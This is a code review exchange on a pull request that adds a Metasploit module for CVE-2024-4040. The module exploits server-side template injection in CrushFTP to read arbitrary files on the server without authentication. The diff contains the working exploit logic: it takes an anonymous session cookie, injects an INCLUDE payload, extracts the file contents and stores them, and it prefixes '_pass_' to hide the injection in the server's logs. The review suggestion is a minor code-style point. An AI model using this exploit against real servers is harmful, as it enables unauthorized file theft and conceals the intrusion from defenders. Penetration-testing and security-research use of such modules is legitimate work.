modules/auxiliary/gather/crushftp_fileread_cve_2024_4040.rb

```diff
@@ -0,0 +1,157 @@
+
+    # Confirm that the "{user_name}" template injection evaluates to "anonymous" in the response
+    unless res_template_inject.body.include?('You need upload permissions to zip a file:anonymous')
+      return Msf::Exploit::CheckCode::Safe('Server-side template injection failed!')
+    end
+
+    Msf::Exploit::CheckCode::Vulnerable('Server-side template injection successful!')
+  end
+
+  def run
+    # Unauthenticated requests to WebInterface endpoints should receive a response containing an 'anonymous' user session cookie
+    print_status('Fetching anonymous session cookie...')
+    res_anonymous = get_anon_session
+
+    fail_with(Failure::Unknown, 'Connection failed') unless res_anonymous
+
+    # Confirm that the response returned a CrushAuth cookie and the status code was 404
+    if (res_anonymous&.code != 404) || res_anonymous&.get_cookies !~ /CrushAuth=([^;]+;)/
+      fail_with(Failure::Unknown, 'The application did not return a 404 response that provided an anonymous session cookie')
+    end
+
+    # Extract the CrushAuth cookie value from the response 'Set-Cookie' data
+    crushauth_cookie = res_anonymous&.get_cookies&.match(/\d{13}_[A-Za-z0-9]{30}/)
+
+    file_name = datastore['TARGETFILE']
+
+    print_status("Using template injection to read file: #{file_name}")
+
+    # These tags will be used to identify the beginning and end of the file data in the response
+    # The string "_pass_" is prepended to the injection to invoke CrushFTP sensitive parameter redaction in logs. The injection will be logged as "********"
+    # NOTE: Due to an apparent bug in the way CrushFTP redacts data, if file paths contain ":", some of the injection will be leaked in logs
+    file_begin_tag = '_pass_'
+    file_end_tag = 'file-end'
+
+    # Perform the template injection for file read
+    res_steal_file = perform_template_injection("#{file_begin_tag}<INCLUDE>#{file_name}</INCLUDE>#{file_end_tag}", crushauth_cookie)
+
+    # Check for failure conditions
+    fail_with(Failure::Unknown, 'Connection failed - unable to perform template injection') unless res_steal_file
+
+    if (res_steal_file&.code != 200) || !(res_steal_file.body.include? file_begin_tag)
+      fail_with(Failure::Unknown, 'The application did not return the file contents as expected')
+    end
+
+    if res_steal_file.body.include? "#{file_begin_tag}<INCLUDE>#{file_name}</INCLUDE>#{file_end_tag}"
+      fail_with(Failure::NotFound, 'The requested file was not found by the server')
+    end
+
+    # Isolate the file contents in the response by extracting data between the begin and end tags
+    file_data = res_steal_file.body[res_steal_file.body.index(file_begin_tag) + file_begin_tag.length..]
+    file_data = file_data.split(file_end_tag)[0]
+
+    if datastore['STORE_LOOT']
+      print_good('Storing the file data to loot...')
+      store_loot(File.basename(file_name), 'text/plain', datastore['RHOST'], file_data, file_name, 'File read from CrushFTP server')
```

Comment:
One common pattern we see is to display the filename to the user after storing it to the loot:
```suggestion
      filename = store_loot(File.basename(file_name), 'text/plain', datastore['RHOST'], file_data, file_name, 'File read from CrushFTP server')
      print_good("Stored the file data to `#{filename}`")
```

Reply:
Great, thanks! I'll implement this for my modules moving forward